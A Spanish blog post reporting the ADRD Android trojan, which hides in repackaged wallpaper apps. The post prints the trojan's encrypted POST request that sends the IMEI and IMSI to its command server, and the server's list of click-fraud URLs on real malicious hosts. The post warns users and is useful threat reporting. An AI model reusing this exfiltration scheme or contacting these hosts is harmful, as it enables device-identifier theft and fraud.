ADRD, otro troyano para Android

Insisto(aunque no sé si lo dije alguna vez),cuidadito movileros que después vienen los lloros.

AegisLab ha encontrado otro troyano para Android que actualmente está vivito y coleando. El autor de éste, por lo visto lo que hace es re-empaquetar software legítimo, añadiéndole el código de dicho troyano. Este malware, por ahora, es común encontrarlo en los fondos de escritorios o wallpapers.

En principio todo lo que hace es aparte de mandar tu IMEI e IMSI a cierto servidor (adrd.taxuan.net) de forma cifrada (DES). Aquí un ejemplo:

1 POST /index.aspx?im=6363ea04af859e4c5b839761a04e04f0b7d5868546a5471587b5db8848de8d7a2efc443455fa0839828c592920ddc1ec6ea1b3acf2b97d46 HTTP/1.1
2 HOST: adrd.taxuan.net

Como se puede observar el parámetro im está cifrado, cuyo texto en claro es:

1 354059xxxxxxxxx&310260xxxxxxxxx&1&6&adrd.zt.cw.4 (las x's son tu IMEI e IMSI).

Luego el servidor la manda al troyano una serie de URLs:

1 B#1#963a_w1|http://59.173.12.105/g/g.ashx?w=963a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#961a_w1|http://59.173.12.105/g/g.ashx?w=961a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#964a_w1|http://59.173.12.105/g/g.ashx?w=964a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#881d_w1|http://59.173.12.105/g/g.ashx?w=881d_w1|1|http://59.173.12.105/add/pk.aspx$%3Cbr%20/%3EB#1#978a_w1|http://59.173.12.105/g/g.ashx?w=978a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#979a_w1|http://59.173.12.105/g/g.ashx?w=979a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#609b_w1|http://59.173.12.105/g/g.ashx?w=609b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1044a_w1|http://59.173.12.105/g/g.ashx?w=1044a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999a_w1|http://59.173.12.105/g/g.ashx?w=999a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999b_w1|http://59.173.12.105/g/g.ashx?w=999b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#999c_w1|http://59.173.12.105/g/g.ashx?w=999c_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059a_w1|http://59.173.12.105/g/g.ashx?w=1059a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1060a_w1|http://59.173.12.105/g/g.ashx?w=1060a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1059b_w1|http://59.173.12.105/g/g.ashx?w=1059b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086d_w1|http://59.173.12.105/g/g.ashx?w=1086d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086e_w1|http://59.173.12.105/g/g.ashx?w=1086e_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086f_w1|http://59.173.12.105/g/g.ashx?w=1086f_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086g_w1|http://59.173.12.105/g/g.ashx?w=1086g_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086h_w1|http://59.173.12.105/g/g.ashx?w=1086h_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086r_w1|http://59.173.12.105/g/g.ashx?w=1086r_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1086t_w1|http://59.173.12.105/g/g.ashx?w=1086t_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089b_w1|http://g.gxsmy.com/?w=1089b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#1089c_w1|http://g.gxsmy.com/?w=1089c_w1|1|http://59.173.12.105/add/pk.asp%3Cbr%20/%3Ex$B#1#1089d_w1|http://g.gxsmy.com/?w=1089d_w1|1|http://59.173.12.105/add/pk.aspx$B#1#962a_w1|http://59.173.12.105/g/g.ashx?w=962a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#768b_w1|http://59.173.12.105/g/g.ashx?w=768b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#965a_w1|http://59.173.12.105/g/g.ashx?w=965a_w1|1|http://59.173.12.105/add/pk.aspx$B#1#780b_w1|http://59.173.12.105/g/g.ashx?w=780b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#834b_w1|http://59.173.12.105/g/g.ashx?w=834b_w1|1|http://59.173.12.105/add/pk.aspx$B#1#959a_w1|http://59.173.12.105/g/g.ashx?w=959a_w1|1|http://59.173.12.105/add/pk.aspx$

Luego el troyano escoge una y accede a la misma. Por ejemplo accediendo a esta url:

Obtenemos como respuesta:

¿El beneficio de ello? Lo mismo el autor se gana un dinerito con visitas a dichas páginas…

¿Cómo se activa el troyano? Pues la forma en que éste funciona es, cuando el usuario instala la aplicación, ésta registra varios receivers como son: RECEIVE_BOOT_COMPLETED o ACCESS_NETWORK_STATE. Cuando nuestro terminal se inicializa por completo el troyano es notificado y ejecuta un proceso en segundo plano que lleva a cabo las operaciones de las que hemos hablado más arriba.

Cuidado con lo que instalas y sobre todo desde donde te lo bajas.

Visto en:Cyberhades

Acerca de Grulleitor

Técnico de mantenimiento,Ingeniero de sistemas y consultor,actualemente trabajando para Doctor Computadora® resolviendo problemas de administrador en S.O. mayormente Windows. Ambiciones: -Intento alcanzar la cumbre del exito de la vida, creando en un futuro un monopolio con filosofia GNU. -Ser un reconocido dibujante de Manga y vivir con mi familia en la Isla de Shikoku(Japón). Ver todas las entradas de Grulleitor

One response to “ADRD, otro troyano para Android

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: